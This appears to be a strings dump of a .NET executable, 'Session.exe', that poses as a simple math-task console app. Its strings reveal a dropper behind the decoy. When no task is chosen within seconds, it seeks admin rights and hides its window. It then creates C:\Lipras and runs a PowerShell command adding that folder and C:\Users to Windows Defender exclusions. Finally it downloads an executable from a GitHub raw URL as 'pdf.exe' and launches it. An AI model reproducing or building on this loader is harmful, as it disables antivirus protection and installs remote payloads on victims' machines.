!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Main>d__20
<>c__DisplayClass20_0
<>c__DisplayClass12_0
<>c__DisplayClass13_0
<>c__DisplayClass14_0
<>c__DisplayClass15_0
<>c__DisplayClass16_0
<>c__DisplayClass17_0
<>c__DisplayClass18_0
<>c__DisplayClass19_0
<>9__0
<CalculateSumOfPowersOf2Async>b__0
<CalculateSumOfFibonacciAsync>b__0
<CalculateSumOfCubesAsync>b__0
<CalculateSumOfDivisiblesAsync>b__0
<CalculateSumOfPrimesAsync>b__0
<CalculateSumOfSquaresAsync>b__0
<CalculateSumOfReciprocalsAsync>b__0
<CalculateSumOfFactorialsAsync>b__0
<Main>b__0
<CalculateSumOfPrimesAsync>g__IsPrime|13_1
<CalculateSumOfFactorialsAsync>g__Factorial|17_1
<>8__1
<>u__1
IEnumerable`1
<CalculateSumOfFibonacciAsync>d__12
<attempts>5__2
Func`2
<CalculateSumOfPrimesAsync>d__13
<inputThread>5__3
<CalculateSumOfDivisiblesAsync>d__14
<url>5__4
<CalculateSumOfSquaresAsync>d__15
<filePath>5__5
<CalculateSumOfCubesAsync>d__16
<>s__6
<CalculateSumOfFactorialsAsync>d__17
<filePath>5__7
<CalculateSumOfPowersOf2Async>d__18
<CalculateSumOfReciprocalsAsync>d__19
<Module>
<Main>
SW_HIDE
System.IO
SW_SHOW
mscorlib
set_Verb
System.Collections.Generic
CalculateSumOfPowersOf2Async
CalculateSumOfFibonacciAsync
CalculateSumOfCubesAsync
CalculateSumOfDivisiblesAsync
CalculateSumOfPrimesAsync
CalculateSumOfSquaresAsync
CalculateSumOfReciprocalsAsync
CalculateSumOfFactorialsAsync
Thread
taskSelected
AwaitUnsafeOnCompleted
get_IsCompleted
choice
get_ExitCode
get_Message
Enumerable
IDisposable
Double
get_MainWindowHandle
DownloadFile
RunFile
IsInRole
WindowsBuiltInRole
Console
LeastCommonMultiple
set_FileName
ReadLine
WriteLine
IAsyncStateMachine
SetStateMachine
stateMachine
System.Core
Dispose
Create
<>1__state
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AsyncStateMachineAttribute
DebuggerStepThroughAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
Session.exe
System.Threading
System.Runtime.Versioning
String
filePath
get_Task
System.Security.Principal
WindowsPrincipal
user32.dll
Program
System
RestartAsAdmin
IsAdmin
Session
get_Location
Action
System.Reflection
SetException
ProcessStartInfo
DirectoryInfo
System.Linq
FibonacciNumber
AsyncTaskMethodBuilder
<>t__builder
CreateFolder
TaskAwaiter
GetAwaiter
set_RedirectStandardError
GreatestCommonDivisor
IntPtr
System.Diagnostics
NativeMethods
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
System.Threading.Tasks
AddDefenderExclusions
SumNaturalNumbers
GetCurrentProcess
SumOfDigits
set_Arguments
Exists
Concat
Format
Object
Select
System.Net
WaitForExit
GetResult
SetResult
WebClient
Environment
GetCurrent
ThreadStart
set_RedirectStandardOutput
MoveNext
HideWindow
set_CreateNoWindow
ShowWindow
nCmdShow
ToArray
GetEntryAssembly
CreateDirectory
set_WorkingDirectory
get_CurrentDirectory
op_Inequality
WindowsIdentity
WrapNonExceptionThrows
Session
Copyright
2024
$49316913-ec82-4f30-b6a0-fe6b10ad28b0
1.0.0.0
.NETFramework,Version=v4.7.2
FrameworkDisplayName
.NET Framework 4.7.20
+Program+<CalculateSumOfFibonacciAsync>d__12
(Program+<CalculateSumOfPrimesAsync>d__13
,Program+<CalculateSumOfDivisiblesAsync>d__14
)Program+<CalculateSumOfSquaresAsync>d__15
'Program+<CalculateSumOfCubesAsync>d__16
,Program+<CalculateSumOfFactorialsAsync>d__17
+Program+<CalculateSumOfPowersOf2Async>d__18
-Program+<CalculateSumOfReciprocalsAsync>d__19
Program+<Main>d__20
C:\Users\danie\source\repos\Session\Session\obj\Debug\Session.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Task 1: Calculate the sum of the first n natural numbers.
The sum of the first {0} natural numbers is {1}
Task 2: Calculate the nth Fibonacci number.
The {0}th Fibonacci number is {1}
Task 3: Calculate the greatest common divisor (GCD) of two numbers.
The GCD of the two numbers is {0}
Task 4: Calculate the least common multiple (LCM) of two numbers.
The LCM of the two numbers is {0}
Task 5: Calculate the sum of the digits of a number.
The sum of the digits of the number is {0}
Failed to elevate the process. Error:
C:\Lipras
Folder 'Lipras' created on C: drive.
Folder 'Lipras' already exists on C: drive.
powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'"
powershell.exe
Folders added to Windows Defender exclusions.
Failed to add folders to Windows Defender exclusions.
File downloaded successfully:
Failed to download file. Error:
File launched successfully:
Failed to launch file. Error:
Sum of Fibonacci numbers up to {0} is {1}
Sum of prime numbers up to {0} is {1}
Sum of numbers divisible by 3 or 5 up to {0} is {1}
Sum of squares up to {0} is {1}
Sum of cubes up to {0} is {1}
Sum of factorials up to {0} is {1}
Sum of powers of 2 up to {0} is {1}
Sum of reciprocals up to {0} is {1}
Choose a task (1-5) within 2 seconds:
1. Calculate the sum of the first n natural numbers.
2. Calculate the nth Fibonacci number.
3. Calculate the greatest common divisor (GCD) of two numbers.
4. Calculate the least common multiple (LCM) of two numbers.
5. Calculate the sum of the digits of a number.
No task selected within 2 seconds. Creating folder 'Jiras' on C: drive.
No task selected within 2 seconds. Adding folders to Windows Defender exclusions.
Choose a task (1-5) within 4 seconds:
No task selected within 4 seconds. Downloading file.
https://github.com/vonuch1/start/raw/refs/heads/main/khtoawdltrha.exe
C:\Lipras\pdf.exe
Invalid choice.
No task selected within 2 seconds. Running downloaded file.
Program will now exit.
Failed to run the file. Program will now exit.
Main program finished.
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Session
FileVersion
1.0.0.0
InternalName
Session.exe
LegalCopyright
Copyright
2024
LegalTrademarks
OriginalFilename
Session.exe
ProductName
Session
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0